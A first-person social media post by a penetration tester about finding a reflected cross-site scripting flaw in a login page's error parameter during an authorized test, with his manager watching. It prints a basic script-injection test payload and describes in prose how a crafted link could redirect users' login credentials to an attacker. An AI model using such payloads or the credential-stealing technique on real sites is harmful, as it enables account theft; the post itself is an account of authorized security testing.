When Your Manager Watches You Work
Nathaniel Shere
Penetration Testing, Cybersecurity Consulting | Making the Internet safer one website at a time | DM me for security questions or inquiries
"Can I watch you work?"
It is one of the scariest questions that a manager can ask.
We were just leaving our daily meeting and I was excited to start work on a fresh web application penetration test when my new manager took me aside and broad sided me with that question. He was a good manager, but he had never done penetration testing before.
Run! Abort! Women and children first! I thought.
Sure! I said.
My natural fear was twofold.
First, real ethical hacking (or "penetration testing") is nothing like the hacking in movies or TV shows. There aren’t blinking firewall boxes that show a completion percentage for your hacking progress. There aren’t fancy, 3-D visual displays of hex data. Two people never type on the same keyboard while windows flash rapidly on and off the screen. And a special light doesn't turn on when malware activates.
In real life, ethical hacking is nine parts boring code review and parameter manipulation to every one part of exciting exploitation. Moreover, the "exciting exploitation" phase simply results in different text on your screen - no confetti or cheering throngs.
Second, I was concerned I wouldn't find any noteworthy vulnerabilities. And if that happened, would my less technical manager understand the hard work and advanced skills (humility is my strong suit) that went into the process or would he focus more on the lack of interesting results?
But, what else could I have said?
So, we both walked back to my desk and made small talk while I set up my environment (opening BurpSuite, configuring log and save files, loading appropriate extensions, etc.).
Finally, I opened the target website and tried to set appropriate expectations with him about the upcoming test.
As it turns out, though, I shouldn't have bothered.
As with most website tests, I started at the login page. I wanted to see if I could bypass the login controls without valid credentials. So, I showed my manager how to test the login for classic SQL injection attacks by submitting username and password combinations with SQL query syntax.
Nothing worked - no SQL injection vulnerability at the login.
However, while we tested, I noted that the error message displayed at the login form "Invalid Credentials" was taken from the URL. In other words, after a failed login, the URL in the browser bar would change to something like the following:
[domain].com/login?error=Invalid+Credentials
After we completed the SQL tests, I drew my manager's attention to this phenomenon. I showed him how changing the URL parameter resulted in a change in the resulting error message. He seemed a little confused, until I made the custom message below appear in big red letters at the top of the login form.
领英推荐
[domain].com/login?error=We+Need+More+Cowbell
"What does that do?" my manager asked. "Is that a vulnerability?"
Not yet, I explained. This is a common trick that developers use to allow arbitrary error messages down the road without needing to make a major code update. It is only a vulnerability if we can inject JavaScript into it.
I showed him an example.
[domain].com/login?error=We+Need+More+Cowbell<script>alert('XSS')</script>
Having done scores of penetration tests at this point, I was accustomed to working for hours and pursuing multiple false trails before finding a significant issue. So, I was as surprised as my manager when I submitted the URL above and a browser alert box appeared, displaying the message 'XSS' in big, bold letters.
"So, that's a vulnerability?" asked my manager excited.
Very much, I replied.
We quickly expanded the exploit. I showed my manager how I could write JavaScript code to change the target of the login form, thereby creating a malicious link. If I sent my link to another user of the system, while appropriately obfuscating my injected code with URL encoding, they would submit their login credentials on the legitimate website - but instead of sending their password to the system itself, they would send it to me. A simple redirect to the original error message would hide my involvement - and the user would think he just fat-fingered his password and try again.
We were 10 minutes into testing.
I hadn't even logged into the system yet.
But, we found a high risk issue.
As I documented the finding, my manager wandered off - clearly impressed and excited to share the story of "our" finding.
Meanwhile, I dialed the number of our client to inform them of the high risk issue while thinking that I may need to set appropriate expectations with my manager again for next time.
Otherwise, he would walk away thinking that hacking is just like the movies.
Software Developer IV - Sports Data and Gaming Technology @ Gannett
2 年Enjoyed the story :) My own experience often differs....